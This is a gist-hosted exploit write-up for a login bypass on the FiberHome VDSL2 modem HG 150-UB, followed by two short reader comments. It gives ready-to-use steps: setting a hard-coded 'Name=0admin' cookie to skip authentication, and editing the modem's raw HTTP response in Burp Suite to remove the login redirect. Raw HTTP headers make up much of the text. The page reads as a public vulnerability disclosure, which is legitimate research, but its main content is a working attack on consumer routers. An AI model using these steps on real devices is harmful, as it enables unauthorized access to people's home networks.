Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
# Exploit Title: FiberHome VDSL2 Modem HG 150-UB Login Bypass
# Date: 04/03/2018
# Exploit Author: Noman Riffat
# Vendor Homepage: http://www.fiberhome.com/
The vulnerability exists in plain text & hard coded cookie. Using any cookie manager extension, an attacker can bypass login page by setting the following Master Cookie.
Cookie: Name=0admin
Then access the homepage which will no longer require authentication.
http://192.168.10.1/
Due to improper session implementation, there is another way to bypass login. The response header of homepage without authentication looks like this.
HTTP/1.1 200 Ok
Server: micro_httpd
Cache-Control: no-cache
Date: Tue, 03 Apr 2018 18:33:12 GMT
Set-Cookie: Name=; path=/
Content-Type: text/html
Connection: close
<html><head><script language='javascript'>
parent.location='login.html'
</script></head><body></body></html>HTTP/1.1 200 Ok
Server: micro_httpd
Cache-Control: no-cache
Date: Tue, 03 Apr 2018 18:33:12 GMT
Content-Type: text/html
Connection: close
<html>
<head>
.. continue to actual homepage source
The response header looks totally messed up and by triggering burp suite and modifying it to following will grant access to homepage without authentication.
HTTP/1.1 200 Ok
Server: micro_httpd
Cache-Control: no-cache
Date: Tue, 03 Apr 2018 18:33:12 GMT
Set-Cookie: Name=; path=/
Content-Type: text/html
Connection: close
<html>
<head>
.. continue to actual homepage source
@cutehameed

This comment has been minimized.

Copy link

commented Nov 18, 2018

Sir how to run the script?

@DarkcoderSe

This comment has been minimized.

Copy link

commented Jun 30, 2019

Thanks for sharing!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.